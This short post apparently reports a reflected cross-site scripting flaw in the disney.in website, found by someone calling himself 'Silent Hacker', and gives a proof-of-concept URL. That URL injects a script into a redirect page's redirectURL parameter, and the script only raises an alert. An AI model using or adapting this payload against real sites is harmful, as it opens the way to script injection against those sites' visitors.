A Hacker calling himself "Silent Hacker" discovered XSS vulnerability in Disney websites. The Disney.in website is found to be vulnerable to Cross site scripting.
POC:
http://www.disney.in/DisneyOnline/j/redirect.jsp?redirectURL=%22%3E%3Cscript%3Ealert%28%22XssEd%20By%20SilenT%20HaXoR%22%29%3C/script%3E